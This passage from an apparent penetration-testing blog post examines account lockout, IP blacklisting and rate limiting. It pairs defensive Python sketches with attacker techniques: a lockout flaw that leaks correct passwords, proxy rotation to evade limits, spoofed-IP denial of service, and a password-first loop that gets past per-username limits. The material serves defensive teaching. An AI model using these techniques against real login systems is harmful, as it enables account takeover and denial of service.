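Here is a minimal sketch of the rate-limited lockout email described above. It assumes a hypothetical `send_email` callback and an illustrative one-hour window. The user gets at most one notification per window, however many locked-out attempts the attacker makes, and the login response stays generic either way.

```python
import time
from typing import Callable, Dict

GENERIC_FAILURE = "Either your username or password was incorrect"

class LockoutNotifier:
    """Email a locked-out user at most once per window, however many attempts arrive."""

    def __init__(self, send_email: Callable[[str], None],
                 window_seconds: float = 3600.0,
                 clock: Callable[[], float] = time.monotonic):
        self.send_email = send_email    # hypothetical mail callback
        self.window = window_seconds    # illustrative one-hour window
        self.clock = clock
        self.last_sent: Dict[str, float] = {}

    def on_locked_attempt(self, email: str) -> str:
        """Handle a login attempt on a locked account; return the user-facing message."""
        now = self.clock()
        last = self.last_sent.get(email)
        if last is None or now - last >= self.window:
            self.send_email(email)
            self.last_sent[email] = now
        # Same text as an ordinary bad password, so the lock itself is not revealed.
        return GENERIC_FAILURE
```

In practice you would queue the email rather than send it inline. That keeps the extra work out of the response time, which is the timing tell mentioned above.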
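Locking out any submitted username can be sketched as a failure counter keyed on the submitted string rather than on a user record, so registered and unregistered usernames behave identically. The limit of 5 follows the paragraph: after five failures, further submissions are locked. `check_password` is a hypothetical callback that returns False for unknown users. Lockout expiry is omitted to keep the sketch short.

```python
from typing import Callable, Dict

MAX_ATTEMPTS = 5
GENERIC_FAILURE = "Either your username or password was incorrect"

class UsernameLockout:
    """Lock any submitted username after MAX_ATTEMPTS failures, registered or not."""

    def __init__(self, check_password: Callable[[str, str], bool]):
        # Hypothetical callback; must return False for usernames that do not exist.
        self.check_password = check_password
        self.failures: Dict[str, int] = {}

    def login(self, username: str, password: str) -> str:
        key = username.strip().lower()  # "Alice" and "alice " share one counter
        if self.failures.get(key, 0) >= MAX_ATTEMPTS:
            return GENERIC_FAILURE      # locked: identical response, password not checked
        if self.check_password(username, password):
            self.failures.pop(key, None)
            return "OK"
        self.failures[key] = self.failures.get(key, 0) + 1
        return GENERIC_FAILURE
```

A real user and a made-up name such as "mallory" end up in exactly the same locked state. Their responses give the attacker nothing to compare.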

Denial of Service using account lockout

The larger issue with account lockout protections is that a malicious attacker can use them to launch targeted denial of service attacks against users of the application. These targeted attacks can cost the company money and customers, or swamp its support personnel with requests from users. Let’s discuss the impact on the application’s “availability” under different types of account lockout:

Denial of Service against different types of account lockout:

- Permanent Account Lockout with self-recovery (requires the user to reset their password)

    - An attacker can lock out the user’s account once every X hours, forcing the user to reset their password. Brute-force risk is reduced if the user is able to change their username to a new value unknown to the attacker during the unlock process.

- Permanent Account Lockout without self-recovery (requires the user to contact a support agent to unlock their account)

    - An attacker can lock out the user’s account once every X hours. Because no self-service recovery option is available, the user has to contact a support representative to unlock their account. This can cause a denial of service for both the user and the company’s support staff. The impact is worse if the support staff have limited availability (Mon – Fri 8-5), or if they are suddenly swamped with calls from thousands of users whose accounts have been locked.

- Temporary Account Lockout with self-recovery (1 – 30 minutes)

    - An attacker can lock out the user’s account every X minutes indefinitely to keep the user permanently locked out of their account.

    - The attacker can still guess a few passwords every time the account unlocks. If it unlocks every 30 minutes and the application allows 5 attempts before locking the account, an attacker can still try around 240 passwords a day while keeping the account locked. If a correct password is guessed, the attacker can access the user’s account. They will likely be able to change the user’s password and email address, permanently locking the original owner out.

    - Risk is reduced if the user is able to reset their own password and unlock their account at the same time. Unless they can also change their username, however, an attacker will still be able to keep the account locked, and the user will be frustrated at constantly needing to reset their password.

- Temporary Account Lockout without self-recovery (typically 1 – 30 minutes)

    - An attacker can lock out the user’s account every X minutes indefinitely (…)

    - The attacker can still guess a few passwords every time the account unlocks (…)

    - Because no self-service recovery option is available, the user has to contact a support representative to unlock their account. A company that has instituted a temporary lockout may not have the support staff needed to unlock accounts, because it relies on the “temporary” nature of the lockout to restore the user’s access eventually. This would likely let the attacker maintain a permanent lock on the user’s account while continuing to guess passwords until the correct one is found.
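The 240-passwords-a-day figure is simple arithmetic: one burst of allowed attempts per lockout period. The helper below is a hypothetical illustration for plugging in your own settings. It assumes the attacker resumes the moment each lock expires, and it ignores the few seconds spent making the attempts themselves.

```python
MINUTES_PER_DAY = 24 * 60

def guesses_per_day(attempts_before_lock: int, lockout_minutes: int) -> int:
    """Approximate ceiling on passwords tried per day against one temporarily locked account."""
    unlock_windows = MINUTES_PER_DAY // lockout_minutes  # times the lock expires each day
    return unlock_windows * attempts_before_lock

print(guesses_per_day(5, 30))  # 48 unlocks * 5 attempts = 240
print(guesses_per_day(5, 1))   # 1440 unlocks * 5 attempts = 7200
```

Shortening the lockout to 1 minute multiplies the attacker's daily budget thirtyfold.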

We can’t write a section like that without showing an example of account lockout gone wrong, can we?

Here’s an example of the response we received from a recent assessment when we locked out our test account using incorrect passwords. Notice that the server responds to the login request with an account lockout message and tells us to try again in 20 minutes. Awesome, this means we know the username is valid, and that the application only locks out the account for 20 minutes.

Wait a minute: immediately after locking the account, we tried the account’s actual password and… received a different response from the server…

Didn’t we just lock the account? Why is the application now saying that our login information is invalid rather than saying that we’ve been locked out?

It turns out that the application only returned a message stating that the account had been locked if you attempted to log in using an incorrect password. If you tried the account’s correct password, the server responded that the login information was invalid. Well, well, well… so even though we’ve locked the account, we can still tell when we’ve guessed the user’s correct password? Sounds too good to be true! I can lock the user’s account, keep them locked out until I’ve discovered their password, then wait 20 minutes for the account to unlock and log in as them? Yeah.
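A regression check catches this flaw easily: once an account is locked, the response for the correct password must be identical to the response for a wrong one. In the sketch below, `vulnerable_login` reproduces the behavior we observed and `fixed_login` checks the lock before looking at the password. The in-memory account store, the messages, and the function names are illustrative, not the assessed application's code.

```python
from typing import Callable, Dict

PASSWORDS: Dict[str, str] = {"victim": "S3cret!"}  # illustrative account store
LOCKED = {"victim"}                                 # account already locked out

def vulnerable_login(user: str, password: str) -> str:
    # Mirrors the observed bug: the lock is only reported after a *wrong* password.
    if PASSWORDS.get(user) != password:
        return "Account locked, try again in 20 minutes" if user in LOCKED else "Invalid login"
    return "Invalid login" if user in LOCKED else "Welcome"

def fixed_login(user: str, password: str) -> str:
    # Check the lock first and never evaluate the password while locked.
    if user in LOCKED:
        return "Invalid login"
    return "Welcome" if PASSWORDS.get(user) == password else "Invalid login"

def lock_leaks_password(login: Callable[[str, str], str], user: str,
                        correct: str, wrong: str) -> bool:
    """True if a locked account answers differently for the right and wrong password."""
    return login(user, correct) != login(user, wrong)
```

Running `lock_leaks_password` against a test account in your own suite flags the vulnerable handler. Against the fixed one, it passes.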

Here’s the output from our custom script used to bypass the CSRF protections on the login page and obtain the server’s responses to each login request:

All of the above scenarios require an attacker to be able to identify valid usernames on the application, so that’s why it’s so important that you aren’t giving away usernames for free. Want to know how usernames are discovered? Check out this post: https://silentbreaksecurity.com/username-discovery/

IP Blacklisting

| Vulnerability | Scanners | Script Kiddies | Amateurs | Hacktivists | Professionals |
|---|---|---|---|---|---|
| Username Discovery |  |  |  |  |  |
| Brute-Force Login |  |  |  |  |  |

This is a fun one. We try to be stealthy, but being blacklisted does occasionally happen during an assessment. When this happens, a simple program like hidemyass or torguard can switch our IP to another in just a few seconds and we’re right back on track. Since we’ve been talking about denial of service in this post already, let’s consider the potential problems with IP Blacklisting:

Permanent Blacklisting

If the application permanently blacklists an IP address found to be conducting automated login attempts, a malicious attacker might do some open-source research to find out who the company’s biggest customers are and which IP addresses those customers use, and then spoof those IP addresses in automated login attempts. End result: the company can end up blacklisting the IPs of some of its biggest customers. This is a blind attack, since responses to the spoofed IP addresses never return to the attacker, but it is a valid theoretical vector for targeted denial of service. Alternatively, the attacker could send automated login attempts while spoofing whole IP ranges, hoping to overload the security device’s blacklist and make the site inaccessible to large swathes of the internet at a time.

Temporary Blacklisting

If you are implementing IP blacklisting, a temporary enforcement will help prevent the long-term risks of spoofed IP Denial of Service attacks, but unfortunately you won’t be able to prevent a recurring attack from a determined attacker unless you also implement a whitelist for IPs that should never be blocked. In the whitelist scenario, if an attacker is able to gain access to an IP address in the whitelisted range, your blacklisting becomes immediately ineffective.
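This minimal sketch shows temporary blacklisting combined with a never-block whitelist, using Python's standard `ipaddress` module. The class name, the 15-minute block, and the example ranges are illustrative assumptions. The ranges are reserved documentation addresses.

```python
import ipaddress
import time
from typing import Callable, Dict, Iterable

class TemporaryBlocklist:
    """Block offending IPs for a limited time, never blocking whitelisted ranges."""

    def __init__(self, whitelist: Iterable[str], block_seconds: float = 900.0,
                 clock: Callable[[], float] = time.monotonic):
        self.whitelist = [ipaddress.ip_network(net) for net in whitelist]
        self.block_seconds = block_seconds  # illustrative 15-minute block
        self.clock = clock
        self.blocked_until: Dict[str, float] = {}

    def _whitelisted(self, ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.whitelist)

    def block(self, ip: str) -> None:
        if not self._whitelisted(ip):
            self.blocked_until[ip] = self.clock() + self.block_seconds

    def is_blocked(self, ip: str) -> bool:
        until = self.blocked_until.get(ip)
        if until is None:
            return False
        if self.clock() >= until:
            del self.blocked_until[ip]  # block has expired
            return False
        return True
```

The whitelist is the weak point the paragraph warns about. Any attacker who gains an address inside `203.0.113.0/24` is never blocked at all.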

IP rate-limiting

| Vulnerability | Scanners | Script Kiddies | Amateurs | Hacktivists | Professionals |
|---|---|---|---|---|---|
| Username Discovery |  |  |  |  |  |
| Brute-Force Login |  |  |  |  |  |

We’ve run across several sites that perform rate-limiting on login requests, but this protection is ultimately ineffective. The application may allow only 5 login attempts per minute, but an attacker can easily determine your rate limits and make the login script abide by the application’s rules. There are 1440 minutes in a day, so that means an attacker could attempt 7200 passwords every 24 hours against a single username. However, a competent attacker will be able to bypass the IP restrictions by multi-threading the login script and using multiple proxies to perform automated login requests. By using multiple proxies, an attacker can perform as many requests as they could in a non-rate-limited application. It does add an additional level of complexity for the attacker to circumvent, so it can still be useful when preventing script kiddies and amateur hackers from attacking your application.
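To make the proxy point concrete, here is a minimal per-IP sliding-window limiter using the paragraph's figure of 5 attempts per minute. A hypothetical helper sends the same 20 requests within one minute, first from one IP and then spread across four. The class and helper names are illustrative.

```python
from collections import defaultdict, deque
from typing import DefaultDict, Deque, List

class PerIPRateLimiter:
    """Sliding window: at most `limit` login attempts per IP per `window` seconds."""

    def __init__(self, limit: int = 5, window: float = 60.0):
        self.limit = limit
        self.window = window
        self.hits: DefaultDict[str, Deque[float]] = defaultdict(deque)

    def allow(self, ip: str, now: float) -> bool:
        q = self.hits[ip]
        while q and now - q[0] >= self.window:
            q.popleft()  # forget attempts that fell out of the window
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True

def allowed_in_one_minute(limiter: PerIPRateLimiter, ips: List[str], requests: int) -> int:
    """Spread `requests` round-robin across `ips` within one minute; count successes."""
    ok = 0
    for i in range(requests):
        ok += limiter.allow(ips[i % len(ips)], now=i * (59.0 / requests))
    return ok

print(allowed_in_one_minute(PerIPRateLimiter(), ["192.0.2.1"], 20))  # 5
print(allowed_in_one_minute(PerIPRateLimiter(), [f"192.0.2.{n}" for n in range(1, 5)], 20))  # 20
```

From a single address only 5 of the 20 attempts get through. With four proxies all 20 do, which is why per-IP limits mostly slow down the less sophisticated attackers.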

Username rate-limiting

| Vulnerability | Scanners | Script Kiddies | Amateurs | Hacktivists | Professionals |
|---|---|---|---|---|---|
| Username Discovery |  |  |  |  |  |
| Brute-Force Login |  |  |  |  |  |

We’ve also seen some applications that don’t rate-limit based upon the login submission’s IP address, but instead rate-limit on the username submitted in the login request. Assuming an attacker just wants access to one of many possible accounts, this can be bypassed by cycling through the hundreds/thousands of usernames and performing login requests in a different loop order:

Typical loop order for credential brute-force guessing attacks:

```python
# This sequence tries all of the passwords on a single username
# before moving on to the next username in the list
for username in usernames:      # Switch the username
    for password in passwords:  # Switch the password
        login(username, password)
```

Username rate-limited loop order for credential brute-force guessing attacks:

```python
# This sequence tries all of the usernames with a single password
# before moving on to the next password in the list
for password in passwords:      # Switch the password
    for username in usernames:  # Switch the username
        login(username, password)
```
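The difference between the two loop orders is easiest to see by counting how many requests separate consecutive attempts against the same username. In this sketch the helper names and the 1,000-account list are illustrative, and no requests are sent.

```python
from typing import Dict, List, Optional, Tuple

Attempt = Tuple[str, str]

def username_major(usernames: List[str], passwords: List[str]) -> List[Attempt]:
    # Typical order: every password against one username, then the next username.
    return [(u, p) for u in usernames for p in passwords]

def password_major(usernames: List[str], passwords: List[str]) -> List[Attempt]:
    # Rate-limit-friendly order: one password against every username, then the next.
    return [(u, p) for p in passwords for u in usernames]

def min_gap_per_username(attempts: List[Attempt]) -> Optional[int]:
    """Fewest requests between two consecutive attempts on the same username."""
    last_seen: Dict[str, int] = {}
    smallest: Optional[int] = None
    for i, (user, _) in enumerate(attempts):
        if user in last_seen:
            gap = i - last_seen[user]
            smallest = gap if smallest is None else min(smallest, gap)
        last_seen[user] = i
    return smallest

users = [f"user{n}" for n in range(1000)]
pwds = ["password1", "password2", "password3"]
print(min_gap_per_username(username_major(users, pwds)))  # 1
print(min_gap_per_username(password_major(users, pwds)))  # 1000
```

At, say, 10 requests per second overall, the password-first order hits each account only once every 100 seconds, which can easily stay under a per-username limit.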

Session Control and CSRF embedded tokens

| Vulnerability | Scanners | Script Kiddies | Amateurs | Hacktivists | Professionals |
|---|---|---|---|---|---|
| Username Discovery |  |  |  |  |  |
| Brute-Force Login |  |  |  |  |  |